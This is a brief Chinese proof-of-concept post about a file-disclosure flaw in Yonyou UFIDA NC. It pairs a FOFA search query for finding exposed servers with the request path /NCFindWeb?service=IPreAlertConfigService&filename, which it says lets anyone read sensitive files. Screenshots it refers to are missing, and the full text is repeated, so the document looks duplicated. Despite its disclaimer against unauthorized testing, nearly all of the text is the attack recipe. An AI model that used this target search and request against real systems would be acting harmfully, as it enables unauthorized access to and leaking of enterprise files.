1.fofa语法
app="用友-UFIDA-NC"
2.漏洞验证:
访问站点,页面为这样:
拼接url:
/NCFindWeb?service=IPreAlertConfigService&filename
返回结果:
拼接url进行文件访问:
如果有敏感文件,则造成信息泄露危害!
声明:此篇文章只做技术分享,提供读者学习与交流,禁止做非法未授权渗透测试!
app="用友-UFIDA-NC"
访问站点,页面为这样:
拼接url:
/NCFindWeb?service=IPreAlertConfigService&filename
返回结果:
拼接url进行文件访问:
如果有敏感文件,则造成信息泄露危害!
声明:此篇文章只做技术分享,提供读者学习与交流,禁止做非法未授权渗透测试!